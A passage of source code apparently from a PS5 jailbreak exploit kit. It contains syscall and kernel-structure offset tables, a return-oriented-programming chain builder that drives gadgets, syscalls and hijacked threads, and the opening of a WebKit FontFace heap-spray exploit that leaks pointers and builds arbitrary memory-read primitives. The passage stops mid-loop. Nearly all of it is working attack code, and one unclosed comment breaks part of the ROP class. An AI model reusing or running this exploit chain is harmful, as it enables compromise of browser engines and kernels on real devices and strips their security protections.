173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8AB5;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318AB5;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF18AB5; //check
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/rop.js:
--------------------------------------------------------------------------------
1 | class rop {
2 |
3 | constructor(stack_size = 0x80000, reserved_stack = 0x10000) {
4 | this.stack_size = stack_size;
5 | this.reserved_stack = reserved_stack;
6 | this.stack_dwords = stack_size / 0x4;
7 | this.reserved_stack_index = this.reserved_stack / 0x4;
8 |
9 | this.stack_memory = p.malloc(this.stack_dwords + 0x2 + 0x200);
10 | this.stack_array = this.stack_memory.backing;
11 | this.stack_entry_point = this.stack_memory.add32(this.reserved_stack);
12 | this.return_value = this.stack_memory.add32(this.stack_size);
13 | this.initial_count = 0;
14 | this.count = 0;
15 |
16 | this.branches = this.return_value.add32(0x8);
17 | this.branches_count = 0;
18 |
19 | this.branch_types = {
20 | EQUAL: 0x314500,
21 | ABOVE: 0x314501,
22 | BELOW: 0x314502,
23 | GREATER: 0x314503,
24 | LESSER: 0x314504,
25 | };
26 |
27 | }
28 |
29 | set_initial_count(count) {
30 | this.initial_count = count;
31 | if (this.count == 0) {
32 | this.count = this.initial_count;
33 | }
34 | }
35 |
36 | clear() {
37 | this.count = this.initial_count;
38 | this.branches_count = 0;
39 | for (let i = 0; i < this.stack_dwords; i++) {
40 | this.stack_array[i] = 0x0;
41 | }
42 | }
43 |
44 | increment_stack() {
45 | return this.count++;
46 | }
47 |
48 | set_entry(index, value) {
49 | if (value instanceof int64) {
50 | this.stack_array[this.reserved_stack_index + index * 2] = value.low;
51 | this.stack_array[this.reserved_stack_index + index * 2 + 1] = value.hi;
52 | } else if (typeof (value) == 'number') {
53 | this.stack_array[this.reserved_stack_index + index * 2] = value;
54 | this.stack_array[this.reserved_stack_index + index * 2 + 1] = 0x0;
55 | if (value > 0xFFFFFFFF) {
56 | alert("you're trying to write a value exceeding 32-bits without using a int64 instance");
57 | }
58 | } else {
59 | alert("You're trying to write a non number/non int64 value?");
60 | }
61 | }
62 |
63 | /**
64 | * performs `*rsp = value; rsp += 8;`
65 | */
66 | push(value) {
67 | this.set_entry(this.increment_stack(), value);
68 | }
69 |
70 | /**
71 | * performs `*dest = value;` in chain
72 | */
73 | push_write4(dest, value) {
74 | this.push(gadgets["pop rdi"]);
75 | this.push(dest);
76 | this.push(gadgets["pop rax"]);
77 | this.push(value);
78 | this.push(gadgets["mov [rdi], eax"]);
79 | }
80 |
81 | /**
82 | * performs `*dest = value;` in chain
83 | */
84 | push_write8(dest, value) {
85 | this.push(gadgets["pop rdi"]);
86 | this.push(dest);
87 | this.push(gadgets["pop rsi"]);
88 | this.push(value);
89 | this.push(gadgets["mov [rdi], rsi"]);
90 | }
91 |
92 | /**
93 | * performs `*dest = rax;` in chain
94 | */
95 | write_result(dest) {
96 | this.push(gadgets["pop rdi"]);
97 | this.push(dest);
98 | this.push(gadgets["mov [rdi], rax"]);
99 | }
100 |
101 | /**
102 | * performs `*dest = eax;` in chain
103 | */
104 | write_result4(dest) {
105 | this.push(gadgets["pop rdi"]);
106 | this.push(dest);
107 | this.push(gadgets["mov [rdi], eax"]);
108 | }
109 |
110 | /**
111 | * pushes rdi-r9 args on the stack for sysv calls
112 | */
113 | push_sysv(rdi, rsi, rdx, rcx, r8, r9) {
114 |
115 | if (rdi != undefined) {
116 | this.push(gadgets["pop rdi"]);
117 | this.push(rdi);
118 | }
119 |
120 | if (rsi != undefined) {
121 | this.push(gadgets["pop rsi"]);
122 | this.push(rsi);
123 | }
124 |
125 | if (rdx != undefined) {
126 | this.push(gadgets["pop rdx"]);
127 | this.push(rdx);
128 | }
129 |
130 | if (rcx != undefined) {
131 | this.push(gadgets["pop rcx"]);
132 | this.push(rcx);
133 | }
134 |
135 | if (r8 != undefined) {
136 | this.push(gadgets["pop r8"]);
137 | this.push(r8);
138 | }
139 |
140 | if (r9 != undefined) {
141 | this.push(gadgets["pop r9"]);
142 | this.push(r9);
143 | }
144 |
145 | }
146 |
147 | /**
148 | * helper function to add a standard sysv call to the chain.
149 | */
150 | fcall(rip, rdi, rsi, rdx, rcx, r8, r9) {
151 | this.push_sysv(rdi, rsi, rdx, rcx, r8, r9);
152 | if (this.stack_entry_point.add32(this.count * 0x8).low & 0x8) {
153 | this.push(gadgets["ret"]);
154 | }
155 | this.push(rip);
156 | }
157 |
158 | /**
159 | * returns the current stack pointer.
160 | */
161 | get_rsp() {
162 | return this.stack_entry_point.add32(this.count * 0x8);
163 | }
164 |
165 | /**
166 | * performs `rsp = dest;` in chain.
167 | * can be used to 'jump' to different parts of a rop chain
168 | */
169 | jmp_to_rsp(dest) {
170 | this.push(gadgets["pop rsp"]);
171 | this.push(dest);
172 | }
173 |
174 | /**
175 | * function intended to build a reusable 'syscall' chain.
176 | * When a syscall returns an error, the stub performs a push rax, a call and a push rbp; this would normally corrupt the rop chain and make it unusable for later reuse.
177 | * The chain therefore restores the three ret slots and the syscall slot itself after the syscall returns.
178 | self_healing_syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
179 | this.push_sysv(rdi, rsi, rdx, rcx, r8, r9);
180 | let restore_point = this.get_rsp();
181 | this.push(gadgets["ret"]);
182 | this.push(gadgets["ret"]);
183 | this.push(gadgets["ret"]);
184 |
185 | if (this.stack_entry_point.add32(this.count * 0x8).low & 0x8) {
186 | this.push(gadgets["ret"]);
187 | restore_point.add32inplace(0x8);
188 | }
189 | this.push(syscalls[sysc]);
190 | this.push_write8(restore_point, gadgets["ret"]);
191 | this.push_write8(restore_point.add32(0x08), gadgets["ret"]);
192 | this.push_write8(restore_point.add32(0x10), gadgets["ret"]);
193 | this.push_write8(restore_point.add32(0x18), syscalls[sysc]);
194 |
195 | }
196 |
197 | /**
198 | * performs `*dest = *dest + value;` in chain
199 | */
200 | push_inc8(dest, value) {
201 | this.push(gadgets["pop rdi"]);
202 | this.push(dest);
203 | this.push(gadgets["pop rax"]);
204 | this.push(dest);
205 | this.push(gadgets["mov rax, [rax]"]);
206 | this.push(gadgets["pop rdx"]);
207 | this.push(value);
208 | this.push(gadgets["add rax, rdx"]);
209 | this.push(gadgets["mov [rdi], rax"]);
210 | }
211 |
212 | /**
213 | * returns the next available branch
214 | */
215 | get_branch() {
216 | return this.branches.add32(this.branches_count++ * 0x10);
217 | }
218 |
219 | /**
220 | * prepares a branch in the rop chain for a 32-bit comparison of [value_address] against compare_value.
221 | * use branch_types.XXXXX as type argument.
222 | * returns the address of the branch table (two rsp values) that set_branch_points fills in later.
223 | * use logical inversions for other jmp types: setne -> inverted sete, setbe -> inverted seta, ...
224 | */
225 | create_branch(type, value_address, compare_value) {
226 | let branch_addr = this.get_branch();
227 |
228 | this.push(gadgets["pop rcx"]);
229 | this.push(value_address);
230 | this.push(gadgets["pop rax"]);
231 | this.push(compare_value);
232 | this.push(gadgets["cmp [rcx], eax"]);
233 | this.push(gadgets["pop rax"]);
234 | this.push(0);
235 |
236 | if (type == this.branch_types.EQUAL) {
237 | this.push(gadgets["sete al"]);
238 | } else if (type == this.branch_types.ABOVE) {
239 | this.push(gadgets["seta al"]);
240 | } else if (type == this.branch_types.BELOW) {
241 | this.push(gadgets["setb al"]);
242 | } else if (type == this.branch_types.GREATER) {
243 | this.push(gadgets["setg al"]);
244 | } else if (type == this.branch_types.LESSER) {
245 | this.push(gadgets["setl al"]);
246 | } else {
247 | alert("illegal branch type.");
248 | }
249 |
250 | this.push(gadgets["shl rax, 3"]);
251 | this.push(gadgets["pop rdx"]);
252 | this.push(branch_addr);
253 | this.push(gadgets["add rax, rdx"]);
254 | this.push(gadgets["mov rax, [rax]"]);
255 | this.push(gadgets["pop rdi"]);
256 | let branch_pointer_pointer_idx = this.increment_stack();
257 | this.push(gadgets["mov [rdi], rax"]);
258 | this.push(gadgets["pop rsp"]);
259 | let branch_pointer = this.get_rsp();
260 | this.increment_stack();
261 |
262 | this.set_entry(branch_pointer_pointer_idx, branch_pointer);
263 |
264 | return branch_addr;
265 | }
266 |
267 | /**
268 | * finalizes a branch by setting the destination stack pointers.
269 | * swap met and not met args if trying for an inverted jmp type.
270 | */
271 | set_branch_points(branch_addr, rsp_condition_met, rsp_condition_not_met) {
272 | p.write8(branch_addr.add32(0x0), rsp_condition_not_met);
273 | p.write8(branch_addr.add32(0x8), rsp_condition_met);
274 | }
275 |
276 | /**
277 | * performs (*address)++; in chain
278 | */
279 | increment_dword(address) {
280 | this.push(gadgets["pop rax"]);
281 | this.push(address);
282 | this.push(gadgets["inc dword [rax]"]);
283 | }
284 | }
285 |
286 | //extension of the generic rop class intended to be used with the hijacked worker thread.
287 | class worker_rop extends rop {
288 |
289 | constructor(stack_size, reserved_stack) {
290 | super(stack_size, reserved_stack);
291 | p.pre_chain(this);
292 | }
293 |
294 | clear() {
295 | super.clear();
296 | p.pre_chain(this);
297 | }
298 |
299 | async call(rip, rdi, rsi, rdx, rcx, r8, r9) {
300 | this.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
301 | this.write_result(this.return_value);
302 | await this.run();
303 | return p.read8(this.return_value);
304 | }
305 |
306 | async syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
307 | return await this.call(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
308 | }
309 |
310 | async add_syscall(sysc, rdi, rsi, rdx, rcx, r8, r9) {
311 | this.fcall(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
312 | }
313 |
314 | async add_syscall_ret(retstore, sysc, rdi, rsi, rdx, rcx, r8, r9) {
315 | this.fcall(syscalls[sysc], rdi, rsi, rdx, rcx, r8, r9);
316 | this.write_result(retstore);
317 | }
318 |
319 | async run() {
320 | await p.launch_chain(this);
321 | this.clear();
322 | }
323 | }
324 |
325 | class thread_rop extends rop {
326 | constructor(name = "rop_thread", stack_size, reserved_stack) {
327 | super(stack_size, reserved_stack);
328 | //we longjmp into the ropchain; longjmp overwrites the first stack entry with its own saved 'return address', which requires us to skip an entry.
329 | this.set_initial_count(1);
330 |
331 | //prepare longjmp context
332 | p.write8(this.stack_memory, gadgets["ret"]); //ret address
333 | p.write8(this.stack_memory.add32(0x08), 0x0); //rbx
334 | p.write8(this.stack_memory.add32(0x10), this.stack_entry_point); //rsp
335 | p.write8(this.stack_memory.add32(0x18), 0x0); //rbp
336 | p.write8(this.stack_memory.add32(0x20), 0x0); //r12
337 | p.write8(this.stack_memory.add32(0x28), 0x0); //r13
338 | p.write8(this.stack_memory.add32(0x30), 0x0); //r14
339 | p.write8(this.stack_memory.add32(0x38), 0x0); //r15
340 | p.write4(this.stack_memory.add32(0x40), 0x37F); //fpu control word
341 | p.write4(this.stack_memory.add32(0x44), 0x9FE0); //mxcsr
342 |
343 | p.writestr(this.stack_memory.add32(0x50), name); //thr name
344 | }
345 |
346 | /**
347 | * returns created pthread_t as int64
348 | */
349 | async spawn_thread() {
350 |
351 | //add pthread_exit((void*)0x44414544); -> "DEAD"
352 | this.fcall(libKernelBase.add32(OFFSET_lk_pthread_exit), 0x44414544);
353 |
354 | await chain.call(libKernelBase.add32(OFFSET_lk_pthread_create_name_np), this.stack_memory.add32(0x48), 0x0, libSceLibcInternalBase.add32(OFFSET_lc_longjmp), this.stack_memory, this.stack_memory.add32(0x50));
355 | return p.read8(this.stack_memory.add32(0x48));
356 | }
357 | }
--------------------------------------------------------------------------------
/document/en/ps5/rop_slave.js:
--------------------------------------------------------------------------------
1 | let my_worker = this;
2 |
3 | self.onmessage = function (event) {
4 | event.ports[0].postMessage(1);
5 | }
--------------------------------------------------------------------------------
/document/en/ps5/webkit.js:
--------------------------------------------------------------------------------
1 | var PAGE_SIZE = 16384;
2 | var SIZEOF_CSS_FONT_FACE = 0xb8;
3 | var HASHMAP_BUCKET = 208;
4 | var STRING_OFFSET = 20;
5 | var SPRAY_FONTS = 0x100A;
6 | var GUESS_FONT = 0x200430000;
7 | var NPAGES = 20;
8 | var INVALID_POINTER = 0;
9 | var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)
10 | var HAMMER_NSTRINGS = 700; //tweak this if crashing during hammer time
11 |
12 | function hex(n) {
13 | if ((typeof n) != "number")
14 | return "" + n;
15 | return "0x" + (new Number(n)).toString(16);
16 | }
17 |
18 | function poc() {
19 |
20 | var union = new ArrayBuffer(8);
21 | var union_b = new Uint8Array(union);
22 | var union_i = new Uint32Array(union);
23 | var union_f = new Float64Array(union);
24 |
25 | var bad_fonts = [];
26 |
27 | for (var i = 0; i < SPRAY_FONTS; i++)
28 | bad_fonts.push(new FontFace("font1", "", {}));
29 |
30 | var good_font = new FontFace("font2", "url(data:text/html,)", {});
31 | bad_fonts.push(good_font);
32 |
33 | var arrays = [];
34 | for (var i = 0; i < 512; i++)
35 | arrays.push(new Array(31));
36 |
37 | arrays[256][0] = 1.5;
38 | arrays[257][0] = {};
39 | arrays[258][0] = 1.5;
40 |
41 | var jsvalue = {
42 | a: arrays[256],
43 | b: new Uint32Array(1),
44 | c: true
45 | };
46 |
47 | var string_atomifier = {};
48 | var string_id = 10000000;
49 |
50 | function ptrToString(p) {
51 | var s = '';
52 | for (var i = 0; i < 8; i++) {
53 | s += String.fromCharCode(p % 256);
54 | p = (p - p % 256) / 256;
55 | }
56 | return s;
57 | }
58 |
59 | function stringToPtr(p, o) {
60 | if (o === undefined)
61 | o = 0;
62 | var ans = 0;
63 | for (var i = 7; i >= 0; i--)
64 | ans = 256 * ans + p.charCodeAt(o + i);
65 | return ans;
66 | }
67 |
68 | var strings = [];
69 |
70 | function mkString(l, head) {
71 | var s = head + '\u0000'.repeat(l - STRING_OFFSET - 8 - head.length) + (string_id++);
72 | string_atomifier[s] = 1;
73 | strings.push(s);
74 | return s;
75 | }
76 |
77 | var guf = GUESS_FONT;
78 | var ite = true;
79 | var matches = 0;
80 |
81 | var round = 0;
82 |
83 | window.ffses = {};
84 |
85 | do {
86 |
87 | var p_s = ptrToString(NPAGES + 2); // vector.size()
88 | for (var i = 0; i < NPAGES; i++)
89 | p_s += ptrToString(guf + i * PAGE_SIZE);
90 | p_s += ptrToString(INVALID_POINTER);
91 |
92 | for (var i = 0; i < 256; i++)
93 | mkString(HASHMAP_BUCKET, p_s);
94 |
95 | var ffs = ffses["search_" + (++round)] = new FontFaceSet(bad_fonts);
96 |
97 | var badstr1 = mkString(HASHMAP_BUCKET, p_s);
98 |
99 | var guessed_font = null;
100 | var guessed_addr = null;
101 |
102 | for (var i = 0; i < SPRAY_FONTS; i++) {
103 | bad_fonts[i].family = "search" + round;
104 | if (badstr1.substr(0, p_s.length) != p_s) {
105 | guessed_font = i;
106 | var p_s1 = badstr1.substr(0, p_s.length);
107 | for (var i = 1; i <= NPAGES; i++) {
108 | if (p_s1.substr(i * 8, 8) != p_s.substr(i * 8, 8)) {
109 | guessed_addr = stringToPtr(p_s.substr(i * 8, 8));
110 | break;
111 | }
112 | }
113 | if (matches++ == 0) {
114 | guf = guessed_addr + 2 * PAGE_SIZE;
115 | guessed_addr = null;
116 | }
117 | break;
118 | }
119 | }
120 |
121 | if ((ite = !ite))
122 | guf += NPAGES * PAGE_SIZE;
123 |
124 | }
125 | while (guessed_addr === null);
126 |
127 | var p_s = '';
128 | p_s += ptrToString(26);
129 | p_s += ptrToString(guessed_addr);
130 | p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
131 | for (var i = 0; i < 19; i++)
132 | p_s += ptrToString(INVALID_POINTER);
133 |
134 | for (var i = 0; i < 256; i++)
135 | mkString(HASHMAP_BUCKET, p_s);
136 |
137 | var needfix = [];
138 | for (var i = 0;; i++) {
139 | ffses["ffs_leak_" + i] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font + 1], good_font]);
140 | var badstr2 = mkString(HASHMAP_BUCKET, p_s);
141 | needfix.push(mkString(HASHMAP_BUCKET, p_s));
142 | bad_fonts[guessed_font].family = "evil2";
143 | bad_fonts[guessed_font + 1].family = "evil3";
144 | var leak = stringToPtr(badstr2.substr(badstr2.length - 8));
145 | if (leak < 0x1000000000000)
146 | break;
147 | }
148 |
149 | function makeReader(read_addr, ffs_name) {
150 | var fake_s = '';
151 | fake_s += '0000'; //padding for 8-byte alignment
152 | fake_s += '\u00ff\u0000\u0000\u0000\u00ff\u00ff\u00ff\u00ff'; //refcount=255, length=0xffffffff
153 | fake_s += ptrToString(read_addr); //where to read from
154 | fake_s += ptrToString(0x80000014); //some fake non-zero hash, atom, 8-bit
155 | p_s = '';
156 | p_s += ptrToString(29);
157 | p_s += ptrToString(guessed_addr);
158 | p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
159 | p_s += ptrToString(guessed_addr + 2 * SIZEOF_CSS_FONT_FACE);
160 | for (var i = 0; i < 18; i++)
161 | p_s += ptrToString(INVALID_POINTER);
162 | for (var i = 0; i < 256; i++)
163 | mkString(HASHMAP_BUCKET, p_s);
164 | var the_ffs = ffses[ffs_name] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font + 1], bad_fonts[guessed_font + 2], good_font]);
165 | mkString(HASHMAP_BUCKET, p_s);
166 | var relative_read = mkString(HASHMAP_BUCKET, fake_s);
167 | bad_fonts[guessed_font].family = ffs_name + "_evil1";
168 | bad_fonts[guessed_font + 1].family = ffs_name + "_evil2";
169 | bad_fonts[guessed_font + 2].family = ffs_name + "_evil3";
170 | needfix.push(relative_read);
171 | if (relative_read.length < 1000) //failed
172 | return makeReader(read_addr, ffs_name + '_');
173 | return relative_read;
174 | }
175 |
176 | var fastmalloc = makeReader(leak, 'ffs3'); //read from leaked string ptr
177 |
178 | for (var i = 0; i < 100000; i++)
179 | mkString(128, '');
180 |
181 | var props = [];
182 | for (var i = 0; i < 0x10000; i++) {
183 | props.push({
184 | value: 0x41434442
185 | });
186 | props.push({
187 | value: jsvalue
188 | });
189 | }
190 |
191 | var jsvalue_leak = null;
192 |
193 | while (jsvalue_leak === null) {
194 | Object.defineProperties({}, props);
195 | for (var i = 0;; i++) {
